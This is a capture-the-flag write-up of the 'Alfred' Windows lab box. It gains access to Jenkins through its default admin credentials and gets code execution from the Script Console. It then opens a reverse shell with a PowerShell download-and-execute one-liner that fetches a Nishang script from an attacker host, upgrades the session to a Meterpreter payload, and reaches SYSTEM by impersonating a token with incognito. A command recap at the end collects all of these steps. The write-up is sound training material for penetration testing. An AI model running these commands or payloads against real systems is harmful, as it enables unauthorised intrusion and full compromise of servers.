0x00 Introduction

This Windows box is a clean lesson in chaining web-to-system exploitation. Jenkins gave us the foothold. Nishang and Meterpreter carried the shell. And Windows access tokens — specifically SeImpersonatePrivilege — handed us SYSTEM without breaking a sweat.

For hunters, the value here isn’t in shiny exploits. It’s in mastering the workflow: misconfigured Jenkins → reverse shell → token abuse → full compromise. If you’re building muscle memory for OSCP or red team work, Alfred is exactly the kind of scenario worth running twice.

0x01 Initial Enumeration

Start wide, then focus. First move was a fast scan:

nmap -F 10.10.176.75

Hits came back on three ports:

• 80/tcp → HTTP

• 8080/tcp → HTTP-proxy

• 3389/tcp → RDP

Port 80 was a dead end. Curl showed nothing but a Bruce Wayne tribute page (bruce.jpg) with a donation email. Standard stego checks (steghide, zsteg, exiftool) came up empty — logged as a red herring.

The real lead sat on 8080. Visiting

http://10.10.176.75:8080

revealed a Jenkins login. First instinct: try defaults.

Username: admin  
Password: admin

And we’re in. Jenkins v2.190.1, according to the footer. A quick version check confirmed what we were hoping: Script Console RCE was fair game.

0x02 Exploiting Jenkins

Once inside Jenkins, the quickest way to weaponize access is the Script Console.
Path:

Manage Jenkins → Script Console

Dropped in a test payload:

whoami

Came back clean; code execution confirmed. That’s all it takes: Jenkins with default creds is essentially remote code execution gift-wrapped.

Dropping a Reverse Shell

Listener up on our end:

nc -lnvp 8888

Served up a Nishang reverse shell:

python3 -m http.server 5555

Payload for Jenkins:

powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888

Connection popped as bruce. First flag down:

type C:\Users\bruce\Desktop\user.txt

At this stage, we’ve proven code exec, landed a stable reverse shell, and confirmed user-level compromise. Next step: tighten control with Meterpreter and line up the privilege escalation.

0x03 Privilege Escalation

The bruce shell was enough for a foothold, but Windows boxes rarely give up SYSTEM that easy. Time to level up.

Upgrading to Meterpreter

Generated a custom payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe

Caught it with a Metasploit handler:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run

Uploaded and executed shell.exe. The session flipped to Meterpreter, giving us better tooling for escalation.

Token Recon

Checked privileges:

getprivs

Gold mine: SeImpersonatePrivilege.

On Windows, access tokens are the keys to the kingdom. If you can impersonate a privileged token, you inherit its rights. SeImpersonatePrivilege makes that attack path trivial.

Abusing Tokens with Incognito

Loaded the module:

load incognito
list_tokens -g

Found what we needed:

Delegation token: BUILTIN\Administrators

Pulled the trigger:

impersonate_token "BUILTIN\\Administrators"
getuid

Result:

NT AUTHORITY\SYSTEM

Locking It In

Migrated into a SYSTEM-owned process for persistence:

ps
migrate <pid>
getuid

Confirmed SYSTEM. Root flag captured:

type C:\Windows\System32\config\root.txt

Box owned.

Side Note: Windows Tokens in the Wild

This box is the perfect case study for why Windows tokens matter.

• Every Windows process runs under a token that defines its privileges.

• If you can impersonate a privileged token (like Administrator or SYSTEM), you don’t need to exploit kernel bugs — you just “borrow” their authority.

• SeImpersonatePrivilege is especially dangerous: it allows a lower-privileged account to act on behalf of higher-privileged accounts, often leading straight to SYSTEM.

In real-world pentests, token abuse is one of the fastest privilege escalation paths on misconfigured servers. The lesson: always check privileges (whoami /priv or getprivs) as soon as you land a shell. Tokens tell the story of what doors are already unlocked.

0x04 Debrief

Alfred was a reminder that you don’t need exploits fresh off Exploit-DB to wreck a system. Everything here was misconfig, default, or built-in:

• Jenkins exposed with weak creds.

• Script Console giving instant RCE.

• Nishang/Metasploit payloads bridging to stable shells.

• Windows token privileges wide open for abuse.

For bug bounty hunters, the real lesson is mindset: don’t overlook defaults. An exposed Jenkins instance might look boring on paper, but if Script Console is enabled, it’s usually a straight shot to code execution. And on Windows, if you see SeImpersonatePrivilege, stop digging — you’re one token impersonation away from SYSTEM.

This isn’t just CTF theater either. Jenkins sits everywhere in CI/CD pipelines. If attackers land there, they inherit build secrets, deployment credentials, and often domain trust. In production, that means far more than just a flag.

0x05 Command Recap

# Recon
nmap -F 10.10.176.75
curl 10.10.176.75  

# Foothold (Jenkins default creds)
# Browse to http://10.10.176.75:8080 and log in as admin:admin

# Reverse Shell
nc -lnvp 8888
python3 -m http.server 5555
# Jenkins Script Console payload:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888  

# Upgrade to Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run  

# Token Abuse
getprivs
load incognito
list_tokens -g
impersonate_token "BUILTIN\\Administrators"
migrate <pid>

# Flags
type C:\Users\bruce\Desktop\user.txt
type C:\Windows\System32\config\root.txt